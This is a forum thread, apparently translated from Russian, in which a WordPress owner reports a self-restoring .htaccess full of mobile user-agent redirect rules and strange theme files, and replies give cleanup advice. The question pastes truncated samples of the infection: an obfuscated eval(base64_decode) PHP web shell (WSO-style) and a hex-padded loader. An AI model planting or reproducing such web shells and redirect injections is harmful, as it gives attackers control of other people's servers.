On the hosting, which is a site for WordPress, there is a .htaccess file. It contains redirected to the page 404.php (one line). For some unknown reason, the file is constantly spontaneously changing. It removes the necessary code and hundreds of lines of strange type code appear:

=<<<CODE RewriteEngine on RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR] RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR] RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR] RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR] RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-

If I delete the .htaccess file at all, after a while it still appears with the same content.

With the above content on the site constantly error "Internal server error".

What it is? How to solve a problem?

PS Also incomprehensible files appear in the WordPress theme:

maink.php with type contents

 <?php eval(base64_decode(' +PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSc+Pic+PC9mb3JtPjwvcHJlPiIpOwp9CgpmdW5jdGlvbiBXU09zZXRjb29raWUoJGssICR2KSB7CiAgICAkX0NPT0tJRVska10gPSAkdjsKICAgIHNldGNvb2tpZSgkaywgJHYpOwp9CgppZighZW1wdHkoJGF1dGhfcGFzcykpIHsKICAgIGlmKGlzc2V0KCRfUE9TVFsncGFzcyddKSAmJiAobWQ1KCRfUE9TVFsncGFzcyddKSA9PSAkYXV0aF9wYXNzKSkKICAgICAgICBXU09zZXRjb29raWUobWQ1KCRfU0VSVkVSWydIVFRQX0hPU1QnXSksICRhdXRoX3Bhc3MpOwoKICAgIGlmICghaXNzZXQoJF9DT09LSUVbbWQ1KCRfU0VSVkVSWydIVFRQX0hPU1QnXSldKSB8fCAoJF9DT09LSUVbbWQ1KCRfU0VSVkVSWydIVFRQX0hPU1QnXSldICE9ICRhdXRoX3Bhc3MpKQogICAgICAgIHdzb0xvZ2luKCk7Cn0KCmlmKHN0cnRvbG93ZXIoc3Vic3RyKFBIUF9PUywwLDMpKSA9PSAid2luIikKCSRvcyA9ICd3aW4nOwplbHNlCgkkb3MgPSAnbml4JzsKCiRzYWZlX21vZGUgPSBAaW5pX2dldCgnc2FmZV9tb2RlJyk7CmlmKCEkc2FmZV9tb2RlKQogICAgZXJyb3JfcmVwb3J0aW5nKDApOwoKJGRpc2FibGVfZnVuY3Rpb25zID0gQGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7CiRob21lX2N3ZCA9IEBnZXRjd2QoKTsKaWYoaXNzZXQoJF9QT1NUWydjJ10pKQoJQGNoZGlyKCRfUE9TVFsnYyddKTsKJGN3ZCA9IEBnZXRjd2QoKTsKaWYoJG9zID09ICd3aW4nKSB7CgkkaG9tZV9jd2QgPSBzdHJfcmVwbGFjZSgiXFwiLCAiLyIsICRob21lX2N3ZCk7CgkkY3dkID0gc3RyX3JlcGxhY2UoIlxcIiwgIi8iLCAkY3dkKTsKfQppZigkY3dkW3N0cmxlbigkY3dkKS0xXSAhPSAnLycpCgkkY3dkIC49ICcvJzsKCmlmKCFpc3NldCgkX0NPT0tJRVttZDUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKSAuICdhamF4J10pKQogICAgJF9DT09LSUVbbWQ1KCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgLiAnYWpheCddID0gKGJvb2wpJGRlZmF1bHRfdXNlX2FqYXg7CgppZigkb3MgPT0gJ3dpbicpCgkkYWxpYXNlcyA9IGFycmF5KAoJCSJMaXN0IERpcmVjdG9yeSIgPT4gImRpciIsCiAgI

and sh.php with content

 <?php //f8d705de3e14403aa916244fe8be5b5bc8851d49ff70f0946d672bf4ad860a4c674a74fd089b12a3bf2a37ab8f4367c352832cec6d7312fc7673ccb11b4a9e2d8aa1ea9fe57c6993fc935ba71db82507535de8979afa5ff81a69d4c0972a09ec251a9cf3aaa0044d1fce4c288571151e4e95fc15387e919a187cfdf8615b9e73ef647d01217c921927371aa2d0039886de5b2007a622f5a0a6c6f79b4ba2b36e47d5abf210b14d0f721a13c0d5ff177dabd11ca01e04ae0cc06d5a2a0e68db905f2d2c37291b1af6c6eaefc51a7bf6ac3f4dd765da70e654ab457bbc7af91d9786717543efa7f19da6f53e70b58252dd023d0c2f8fae8ab5232c69d7b2dee5d0bbda2f1f6f5cc29fec32e4b98025744fcdb644b42f1874d61fdff2bef129eacc02816d7fbb0f47007d6e4b7cce71e7b6abe9981cb545e2eb78e244ea51f7a5455284e8f1a5fab5e40521a3ec17908115d4be53529b251bea6571281a7b054d77ec9fd45b0adb7c46e2e16633609c30912f506c8455f89a9efd95bec6a82659be14a421c71eb897a15d98cb33356df2c3ce8ad99a2582c55069e1755e7b95a5d1db5fbc87d63518be65470b77019b0c7a755e97d14047aad1dce1fabb31cbb28be22d108f33eeca423d028f0b4de955637255ba845122be65310e6b9cf6f1a002af8efd93c5198bb28fd4da21b7a677093f197a1b9dbc49eb56c693b691aaab437a8e6e9e0052e7d1b506ef8cd16d7083cb1867af25dc09b58e1d6e32830403d1a144f68f9d7cdec1cea2c3aac82106cc5b8ed157dc99d9aa82df9a2e0c0a32fd7138a73e759d41cd6becd39cd8024d5481507a31976fdad259e7d94bdb35fef80a5c6b98496c9a2b1c6308fedae2d22415f7ecd29cfa9ed470e272a335be46171f4fdb37f0fb8338723bcca5a1c70abeec2096ac333bc6ac3969b63e0d980e8ec17f267d3644ce762eee90a62bcdddf190c13f36e31dd4af140005f4da62b22cd9a4a0b6d56237aea342547b1db990b146970a7d8a57b79ccbde63145a002e10d394c4c42cd1122cad4c159f7404e2c79e81b9b855c791bacc8011952312c0b475f23c579f8d8a814ca15e9cff9698f372e48a5458b050d1db41b02f277b7fd6e03f9d043ee4c2d377c383a5e44deb809a4e7f26bfad4656473f2f16b1b5faed70f6effb0ab4f0d9c125959feac2a1184c3dd06bf9b20e47dd5bd7544a1fc393d86b3803ea1ca7dbbd0bb7c47aee89a91c9cf658683e0caaecc704e77ebdacb198b66c4cc2f3200207089269228e8df65bb1ecebe08af0f6d167bf1996a072ff40f85631fe695675873910d91013a1df454c55bef8868fe55b26b8469695fa8cb875ab5592605b0a909469c837a3335ba8aedab7f5c421e2357e74047cb58ae3ecb433ecc3cf642c2eb3d834bfd93250e2211a109e77fa545aa6551e6200693197e71f38dd7b11499e335af3320d36c00b969a26bcc44665478f61227fbbed0898131088ed76f400ac00e4a29e937ba4992206f5c2ae96077bad3cbee783838dd64fc2784de88739d5c36715d1309bb29ae3da097fc54358dc6e3540584f36294bdc9bfa2bdf7442cea54314b81460a8e550aec11805b674d3755efc01018b31b2e7647d6c08be1cd628ccfa217c1825e510ad7d4bc19f877b17cb467e10bddf59183a8eeabb44cbf1e8660001571f515b0b4969a316ef521336bb36903ee4280c4a594e90adc0a6a59ce789b902bf153becd26100ec5c2e48140aa0b49134889d94481b68cc5c55bae0be749f672f6c7fc332df791f276bbf020204aac5db14e24486ae2a69a7cefc0e45b7844dd773fc548b7db7ab2258e36a12aea85e37b66de9b9b14b789d6f1b14c7125256ebf85e3f31058fa299639743690aa2ec7e47789a42cd1fa8acf1d45810f26a4fb142b63df4d0672a8296c8803a1ff1e00d07 eval(base64_decode("Ly9mOGQ3MDVkZTNlMTQ0MDNhYTkxNjI0NGZlOGJlNWI1YmM4ODUxZDQ5ZmY3MGYwOTQ2ZDY3MmJmNGFkODYwYTRjNjc0YTc0ZmQwODliMTJhM2JmMmEzN2FiOGY0MzY3YzM1MjgzMmNlYzZkNzMxMmZjNzY3M2NjYjExYjRhOWUy
  • one
    The virus :) - thunder
  • So what to do? How to cure a site? - Frontender

1 answer 1

look for the code where maink is mentioned, see recent file changes.
and in the future, make available for writing only those files that should be available for writing. although in your case I would readonly all the files and look for where it lives :)

In general, ideally, remove everything nafig and pour from scratch and the last version of WP

  • So I will. - Frontender
  • one
    And the most important thing is forgotten, PPC! Change FTP password :) - lampa
  • @lampa well, essno)))) and if it’s your server (i.e., not hosting), then I would generally look at the created users, the scripts in externally accessible directories, etc. - thunder